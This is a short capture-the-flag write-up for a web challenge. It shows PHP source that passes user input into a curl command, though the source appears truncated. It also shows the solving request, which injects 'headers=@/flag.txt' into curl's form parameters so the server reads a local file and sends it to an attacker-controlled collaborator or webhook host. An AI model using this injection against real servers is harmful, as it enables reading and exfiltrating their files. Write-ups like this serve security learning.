Tags: web
Rating: 5.0
Source code of the challenge:
if($_SERVER['REMOTE_ADDR'] == ''){ die('curl :thonk:');}
$url = 'http://localhost';
$method = 'GET';
$formParams = [];
if(isset($_GET['url'])){ $url = $_GET['url'];}
if(isset($_GET['method'])){ $method = $_GET['method'];}
if(isset($_GET['formParams'])){ $formParams = $_GET['formParams'];}
$cmd = 'curl ';
$cmd .= '--proto -file ';
$cmd .= escapeshellarg($url).' ';
$cmd .= '-X ';
$cmd .= escapeshellarg($method).' ';
foreach($formParams as $key => $value){
$cmd .= '-F ';
$cmd .= escapeshellarg($key.'= '.$value);
header('Content-Type: text/plain');
Read the [curl manual](https://curl.se/docs/manpage.html) and use the following example as solution:
curl -F "submit=OK;headers=@headerfile" example.com
Request sent to the server:
GET /?url=[insert burp collaborator or webhook.site payload here]&method=GET&formParams[submit]=a;headers=@/flag.txt HTTP/1.1
Host: raas-v1.asisctf.com:9000
Request received on the burp collaborator/webhook.site from the server:
GET / HTTP/1.1
User-Agent: curl/7.74.0